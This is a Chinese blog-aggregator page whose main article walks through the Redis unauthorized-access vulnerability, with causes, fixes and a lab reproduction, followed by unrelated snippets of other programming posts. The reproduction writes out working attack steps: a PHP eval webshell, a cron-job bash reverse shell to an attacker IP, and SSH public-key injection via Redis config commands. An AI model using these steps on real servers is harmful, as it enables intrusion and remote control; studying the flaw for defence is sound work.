当前位置：首页 > news >正文

redis 未授权访问漏洞

news 2025/7/5 18:32:54

redis 未授权访问漏洞

漏洞描述

漏洞原因：

漏洞危害

漏洞复现：

漏洞复现

写webshell:

写计划任务：centos默认在/var/spool/cron

写ssh公钥实现ssh登录：

漏洞描述：

Redis默认情况下，会绑定在0.0.0.0:6379(在redis3.2之后，redis增加了protected-mode，在这个模式下，非绑定IP或者没有配置密码访问时都会报错)，如果没有进行采用相关的策略，比如添加防火墙规则避免其他非信任来源ip访问等等，这样将会将Redis服务暴露在公网上，如果在没有设置密码认证(默认为空)的情况下，会导致任意用户在可以访问目标服务器的情况下未授权访问Redis以及读取Redis的数据。攻击者在未授权访问Redis的情况下，利用Redis自身的提供的config命令，可以进行写文件操作，攻击者还可以成功将自己的ssh公钥写入目标服务器的/root/.ssh文件的authotrized_keys 文件中，进而可以使用对应私钥直接使用ssh服务器登录目标服务器。

漏洞原因：

(1) Redis绑定在0.0.0.0:6379,且没有进行添加防火墙规则避免其他非信任来源ip访问等相关安全策略，直接暴露在公网

(2) 没有设置密码认证（默认为空）或者弱密码，可以免密码登录redis服务

版本：redis 2.x 3.x 4.x 5.x

漏洞危害：

(1) 攻击者无需认证访问到内部数据,可能导致敏感信息泄露，黑客也可以恶意执行flushall来清空所有数据
(2) 攻击者可通过eval执行lua代码，或通过数据备份功能往磁盘写入后门文件
(3) 如果redis以root身份运行，黑客可以给root账户写入SSH公钥文件，直接通过SSH登录目标服务器

修复建议：

1、禁止外部访问redis服务端口

2、禁止使用root权限启动redis服务

3、配置安全组，限制可连接的redis服务的ip

4、redis设置用户名和密码访问

漏洞复现：

修改配置：

#bind 127.0.0.1
protected-mod no

重启服务：

./redis-server /root/redis-6.2.5/redis.conf

漏洞复现

写webshell:

客户端：

./redis-cli -h 192.168.26.153

192.168.26.153:6379> config set dir /var/www/html
OK
192.168.26.153:6379> config set dbfilename redis.php
OK
192.168.26.153:6379> set webshell "\n\r\n\r<?php phpinfo();?>\n\r\n\r"
OK
192.168.26.153:6379> save
OK


"\n\r\n\r<?php @eval($_POST['cmd']);?>\n\r\n\r"

写计划任务：centos默认在/var/spool/cron

not connected> config get dir
1) "dir"
2) "/root/redis-6.2.5/src"
192.168.26.153:6379> config set  dir /var/spool/cron
OK
192.168.26.153:6379> config set dbfilename root
OK
192.168.26.153:6379> set ddd "\n\n\n* * * * * bash -i >& /dev/tcp/192.168.26.144/7777 0>&1\n\n\n"
OK
192.168.26.153:6379> save

攻击机上使用nc监听,然后进行登录：

nc -lvp 7777

结果：

写ssh公钥实现ssh登录：

攻击机上生成公钥和私钥

ssh-keygen -t rsa

2、进入/root/.ssh，将公钥写入key.txt文件（前后用\n换行，避免和redis里其他缓存数据混合）

(echo -e “\n”;cat id_rsa.pub;echo -e “\n”)>key.txt

3、再把key.txt文件内容写入redis缓冲

cat key.txt| /root/redis-6.2.5/src/./redis-cli -h 192.168.26.153 -x set pub

4、设置redis的默认文件路径为/root/.ssh且文件名为authorized_keys，然后save保存。

192.168.26.153:6379> ping 
PONG
192.168.26.153:6379> config set  dir /root/.ssh
OK
192.168.26.153:6379> config set dbfilename authorized_keys
OK
192.168.26.153:6379> config get dbfilename 
1) "dbfilename"
2) "authorized_keys"
192.168.26.153:6379> save
OK
192.168.26.153:6379>

5、在攻击机中使用ssh免密登录靶机

redis 未授权访问漏洞

redis 未授权访问漏洞目录 redis 未授权访问漏洞漏洞描述漏洞原因： 漏洞危害漏洞复现： 漏洞复现写webshell: 写计划任务：centos默认在/var/spool/cron 写ssh公钥实现ssh登录： 漏洞描述： Redis默认情况下…...

编程日记 2023/3/3 6:28:01

如何制作一个自定义的winpe?

winpe制作过程获取相关资源 https://www.aliyundrive.com/s/MP58JbRsm76 文件存放位置将压缩包存放在一个全英文目录下了,我这里选择了D:/winpe目录解压文件将三个压缩包进行解压到当前目录,如下图所示创建一个mount目录,并在mount目录下分别创建boot和install目…...

编程日记 2023/3/3 6:26:50

QString转为2进制，8进制，10进制，16进制介绍

首先看段代码： bool ok false;QString ss "11";qDebug()<<"-----"<<ss.toInt(&ok,2)<<ss.toInt(&ok,10)<<ss.toInt(&ok,16)<<ss.toInt(&ok,8);结果： ----- 3 11 17 9 bool ok fal…...

编程日记 2023/3/3 6:25:41

2023-3-2-22:01随笔

好久没怎么更新技术分享博客了。去年从2022年1月3日到2023年1月份一直专注于ADAS的行车横向功能的研发与实车调试，2022年写了几篇项目经验的文章，像LQR算法（虽然和同事（志同道合，技术追求的民哥）写出的工程…...

编程日记 2023/3/3 6:24:18

学习红客技术必备，手把手教你成为“安防第一人”

互联网时代已悄悄来临，作为新时代的人们，我们日常生活、工作、学习方面都需要借助互联网来完成，这样，又产生一种新的问题，那就是网络安全的问题，有时我们拼命加班好不容易完成的东西，在一夜之间…...

编程日记 2023/3/3 6:23:02

Git系列：常见指令辨析

Git系列：常见指令辨析指令辨析工作区、暂存区、版本库傻傻分不清楚？主干和分支的关系是什么？git fetch/merge/pull辨析日志查看时，git log与git reflog的区别是？git diff和status的区别是？相关资料本文小结…...

编程日记 2023/3/3 6:21:41

并发编程实战-构建自定义的同步工具

文章目录1.状态依赖性的管理1.1 示例：将前提条件的失败传递给调用者1.2 示例：通过轮询与休眠来实现简单的阻塞1.3 条件队列2.使用条件队列2.1 条件谓词2.2 过早唤醒2.3 丢失的信号2.4 通知2.5 示例：阀门类2.6 子类的安全问题2.7 入口协议与出…...

编程日记 2023/3/3 6:20:12

HBase集群部署

目录一、前期准备二、HBase下载 1. 查看HBase与hadoop版本对应关系 2. hbase的下载 3. 将hbase的tar包上传到linux 下二、安装hbase 1. 解压 2. HBase的文件配置主机名hadoop版本HBase版本hadoop安装路径Hbase安装路径HadoopMaster3.3.02.4.3/home/hadoop/softwareh…...

编程日记 2023/3/3 6:18:27

网络传输：linux下的网络请求和下载（ping wget curl）、端口

一、下载和网络请求 1.ping命令可以通过ping命令，检查指定的网络服务器是否可连通状态语法：ping [-c num] ip或主机名选项： -c 检查的次数，若不使用-c，将无限次数持续检查参数：ip或主机名&#xff0c…...

编程日记 2023/3/3 6:17:16

阅读（1）-----六级

目录 1.单词不懂怎么办？ 1.1构词法 1.2上下文 2.句子不通怎么办？ 3.时间不够怎么办 ？ 4.题型 4.1细节题问文章的细节 4.2主旨题(文章主旨和段落主旨) 4.3语义题 4.4观点题 （一共三种，支持、反对和中立 &…...

编程日记 2023/3/3 6:16:07

【Python实战】快看：”又中奖了，中大奖了“周围的小伙伴都惊呆了~你还不麻溜滴~（代码版彩票小游戏上线啦）

导语哈喽！北鼻们，晚上好。夕阳🌇的第一缕阳光送给小可爱们~每天都要加油鸭！ 所有文章完整的素材源码都在👇👇 粉丝白嫖源码福利，请移步至CSDN社区或文末公众hao即可免费。彩票是一个恒古不…...

编程日记 2023/3/3 6:14:42

【python】控制台中文输出乱码解决方案

注：最后有面试挑战，看看自己掌握了吗文章目录控制台原因解决方法方法一方法二方法三如果是os.system函数乱码控制台原因一般的情况下，还是我们的源码文件的编码格式问题。我们一般是要把源码文件的编码格式改成utf-8就好了，但是…...

编程日记 2023/3/3 6:13:16

一名IC验证工程师的成长路径是怎么样的？来听听工程师的见解

IC验证这个岗位对于非科班的学生是比较友好的，因为验证需要具备的技能UVM，SV，C等，非科班和科班的差距不会拉开太大。因其岗位需求量巨大而格外受到了大家的青睐，甚至成为不少学生的转行首选。验证对于IC的重要性 IC…...

编程日记 2023/3/3 6:11:41

java工具jconsole/jstat学习

参考视频【java】jvm指令与工具jstat/jstack/jmap/jconsole/jps/visualVM_哔哩哔哩_bilibili 一、jps 我们再windows和linux都可以看到哪些java进程。有小伙伴又会问了这个类是java的那其他的这么多进程18096 /8685 这些是啥啊其实也是java进程，只不过是其他程…...

编程日记 2023/3/3 6:10:21

WSN_1 介绍；部分应用介绍

学习自书籍：Fundamentals of Wireless Sensor Networks. WSN 介绍传感器从基础角度说，传感器观测采集现实世界的一些数据。另一个名称是 transducer 换能器，指传感器将一些形式的信号转换为其他形式的信号，如光敏传感器光…...

编程日记 2023/3/3 6:09:07

linux常用命令介绍 05 篇——实际应用篇（用 cut、uniq等统计文档里每个关键词出现的次数）

linux常用命令介绍 05 篇——实际应用篇（用 cut、uniq等统计文档里每个关键词出现的次数）1. 先导文章——关于行过滤和列截取2. 关于单个统计单词个数2.1 grep2.2 wc3. 统计文档中每个关键词出现的次数3.1 先看文档内容需求3.1.1 文档内容3.1.2 需求…...

编程日记 2023/3/3 6:07:40

大数据处理学习笔记1.7 Scala类与对象

文章目录零、本节学习目标一、类（一）类的定义（二）类的实例化二、单例对象（一）单例对象概念（二）案例演示三、伴生对象（一）伴生对象概念（二&#xf…...

编程日记 2023/3/3 6:06:13

Feign踩坑源码分析 -- 请求参数分号变逗号

一.案例 1.1.Post请求： http://localhost:8250/xx/task/test json格式参数： {"string": "a;b;c;d" } 1.2.controller代码： AutowiredDataSourceClientService dataSourceClientService;RequestMapping("/test"…...

编程日记 2023/3/3 6:04:57

注:1.通用配置只支持二段路由,二段及以上依然需要单独进行配置 2.所有location后面的路径,都需要使用通配符进行配置 location ^~ /phdp/ {try_files $uri $uri/ /phdp/index.html;index ruoyi.html index.html index.htm;}location ^~ /phdp-api/ {client_max_body_size 20m;p…...

编程日记 2023/3/3 6:03:51

Linux系统安装：Zookeeper

目录 Zookeeper的安装 1、环境准备 2、上传 3、解压文件到opt/zookeeper目下 4、安装完后进入zookeeper，找到conf目录 5、复制zoo_sample.cfg 6、编辑zoo.cfg 7、复制一份会话，进入zookeeper安装目录，创建一个文件夹zkdata&#xff0…...

编程日记 2023/3/3 6:02:34

浅谈 React Hooks

React Hooks 是 React 16.8 引入的一组 API，用于在函数组件中使用 state 和其他 React 特性（例如生命周期方法、context 等）。Hooks 通过简洁的函数接口，解决了状态与 UI 的高度解耦，通过函数式编程范式实现更灵活 Rea…...

编程新知 2025/6/15 8:06:37

三维GIS开发cesium智慧地铁教程（5）Cesium相机控制

一、环境搭建 <script src"../cesium1.99/Build/Cesium/Cesium.js"></script> <link rel"stylesheet" href"../cesium1.99/Build/Cesium/Widgets/widgets.css"> 关键配置点： 路径验证：确保相对路径.…...

编程新知 2025/6/21 4:17:55

Cesium1.95中高性能加载1500个点

一、基本方式： 图标使用.png比.svg性能要好 <template><div id"cesiumContainer"></div><div class"toolbar"><button id"resetButton">重新生成点</button><span id"countDisplay&qu…...

编程新知 2025/7/4 7:21:24

Java - Mysql数据类型对应

Mysql数据类型java数据类型备注整型INT/INTEGERint / java.lang.Integer–BIGINTlong/java.lang.Long–––浮点型FLOATfloat/java.lang.FloatDOUBLEdouble/java.lang.Double–DECIMAL/NUMERICjava.math.BigDecimal字符串型CHARjava.lang.String固定长度字符串VARCHARjava.lang…...

编程新知 2025/7/5 18:01:45

【Oracle】分区表

个人主页：Guiat 归属专栏：Oracle 文章目录 1. 分区表基础概述1.1 分区表的概念与优势1.2 分区类型概览1.3 分区表的工作原理 2. 范围分区 (RANGE Partitioning)2.1 基础范围分区2.1.1 按日期范围分区2.1.2 按数值范围分区 2.2 间隔分区 (INTERVAL Partit…...

编程新知 2025/6/26 10:09:03

Springboot社区养老保险系统小程序

一、前言随着我国经济迅速发展，人们对手机的需求越来越大，各种手机软件也都在被广泛应用，但是对于手机进行数据信息管理，对于手机的各种软件也是备受用户的喜爱，社区养老保险系统小程序被用户普遍使用，为方…...

编程新知 2025/7/5 17:35:41

关键领域软件测试的突围之路：如何破解安全与效率的平衡难题

在数字化浪潮席卷全球的今天，软件系统已成为国家关键领域的核心战斗力。不同于普通商业软件，这些承载着国家安全使命的软件系统面临着前所未有的质量挑战——如何在确保绝对安全的前提下，实现高效测试与快速迭代？这一命题正考验着…...

编程新知 2025/7/4 19:17:59

OD 算法题 B卷【正整数到Excel编号之间的转换】

文章目录正整数到Excel编号之间的转换正整数到Excel编号之间的转换 excel的列编号是这样的：a b c … z aa ab ac… az ba bb bc…yz za zb zc …zz aaa aab aac…; 分别代表以下的编号1 2 3 … 26 27 28 29… 52 53 54 55… 676 677 678 679 … 702 703 704 705;…...

编程新知 2025/6/21 6:31:24